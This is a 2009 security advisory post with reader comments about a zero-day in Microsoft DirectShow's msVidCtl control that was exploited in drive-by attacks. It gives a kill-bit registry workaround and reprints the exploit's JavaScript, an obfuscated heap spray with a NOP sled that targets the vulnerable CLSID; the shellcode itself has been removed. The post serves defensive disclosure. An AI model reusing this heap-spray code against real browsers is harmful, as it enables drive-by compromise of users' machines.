0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

Published: 2009-07-06. Last Updated: 2009-07-07 14:08:53 UTC
by Stephen Hall (Version: 2)
8 comment(s)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors' updates to ensure coverage as early as possible for this exploit; with the code publicly available, it is likely to be widely deployed.

A valid workaround for this attack vector is available: it sets the kill bit for the vulnerable control, preventing Internet Explorer from loading it.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

Details of the exploit are available on the CSIS web site, but are included below:


var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
    omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
    shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
    memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

UPDATE July 6, 2009 19:00 UTC

Microsoft has released an advisory covering this exploit; it can be found here:
http://www.microsoft.com/technet/security/advisory/972890.mspx

In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/

Keywords: msVidCtl zero day

Comments

Please note that there is a typo in the CSIS link embedded in the text, it has a double "http://". The correct URL is http://www.csis.dk/en/news/news.asp?tekstID=799
Thanks, fixed
Hi,
Can we get the English version for the same?
Google does a fair job:

http://translate.google.com/translate?prev=hp&hl=en&js=n&u=http%3A%2F%2Fwww.csis.dk%2Fdk%2Fnyheder%2Fnyheder.asp%3FtekstID%3D799&sl=da&tl=en&history_state0=
Thanks Stephen.
Microsoft has issued an advisory, here:

http://www.microsoft.com/technet/security/advisory/972890.mspx

This is still an early notice, but includes 45 CLASSIDs for this control, which they do not believe are designed to be exposed via Internet Explorer and thus should be safe to killbit.
